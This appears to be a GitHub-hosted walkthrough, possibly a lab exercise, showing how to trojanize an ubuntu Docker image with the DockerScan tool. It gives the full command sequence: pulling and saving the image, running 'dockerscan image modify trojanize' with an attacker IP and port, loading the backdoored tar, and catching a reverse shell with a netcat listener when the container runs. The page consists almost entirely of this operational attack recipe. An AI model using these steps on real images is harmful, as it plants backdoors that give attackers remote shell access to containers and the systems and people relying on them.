You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A docker image can be trojanized by a tool called DockerScan. When a trojanized container is launched, the attacker can get a reverse-shell on-to the container
Pull and save ubuntu image (ubuntu:latest) that is to be trojanized.
docker pull ubuntu:latest && docker save ubuntu:latest -o ubuntu-latest
Step 2:
Fetch VM IP by running ifconfig
Step 3:
Set the necessary environment variables for dockerscan to run
export LC_ALL=C.UTF-8
export LANG=C.UTF-8
Trojanize the saved docker file by running dockerscan image modify trojanize ubuntu-latest -l <REMOTE_MACHINE_IP> -p <PORT> -o ubuntu-latest-trojanized. It will create a .tar file.
Step 4:
Once the command on Step 3 has been run, a netcat command is returned. Copy and paste the command in another tab.
Step 5:
Load the trojanized docker .tar file by running docker load -i ubuntu-latest-trojanized.tar
Step 6:
When the trojanized docker is run, the listener should have reverse-shell access to the container
